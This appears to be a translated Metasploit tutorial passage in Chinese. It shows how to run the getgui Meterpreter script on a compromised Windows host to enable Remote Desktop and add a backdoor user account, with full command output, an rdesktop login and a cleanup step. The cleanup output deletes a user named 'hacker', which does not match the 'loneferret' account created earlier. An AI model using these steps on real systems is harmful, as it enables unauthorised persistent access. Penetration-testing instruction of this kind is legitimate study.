让我们看看另一种情况,Metasploit使仅使用内置系统工具就可以很容易地对系统进行后门操作。我们将利用Carlos Perez的getgui脚本,该脚本启用远程桌面并创建一个用户帐户供您登录。使用此脚本再简单不过了。
meterpreter > run getgui -h [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp. [!] Example: run post/windows/manage/enable_rdp OPTION=value [...] Windows Remote Desktop Enabler Meterpreter Script Usage: getgui -u -p Or: getgui -e OPTIONS: -e Enable RDP only. -f Forward RDP Connection. -h Help menu. -p The Password of the user to add. -u The Username of the user to add. meterpreter > run getgui -u loneferret -p password [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Language detection started [*] Language detected: en_US [*] Setting user account for logon [*] Adding User: loneferret with Password: password [*] Adding User: loneferret to local group '' [*] Adding User: loneferret to local group '' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc meterpreter >
我们完成了!这就对了。让我们测试一下连接,看看它真的可以那么容易。
在这里,我们看到了。我们使用rdesktop命令并指定了要用于登录的用户名和密码。然后,我们收到一条错误消息,让我们知道某个用户已经登录到系统控制台,如果继续,该用户将断开连接。这是Windows XP桌面系统的预期行为,因此我们可以看到一切正常。请注意,Windows Server允许并发图形登录,因此您可能不会遇到此警告消息。
请记住,这些变化可能非常强大。但是,请明智地使用该功能,因为所有这些步骤都会以调查人员可以用来跟踪对系统采取何种操作的方式来更改系统。进行的更改越多,您留下的证据就越多。
完成当前系统的操作后,您将需要运行提供的清除脚本以删除添加的帐户。
meterpreter > run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc [*] Running Command List ... [*] Running command execute -H -f cmd.exe -a "/c net user hacker /delete" Process 288 created. meterpreter >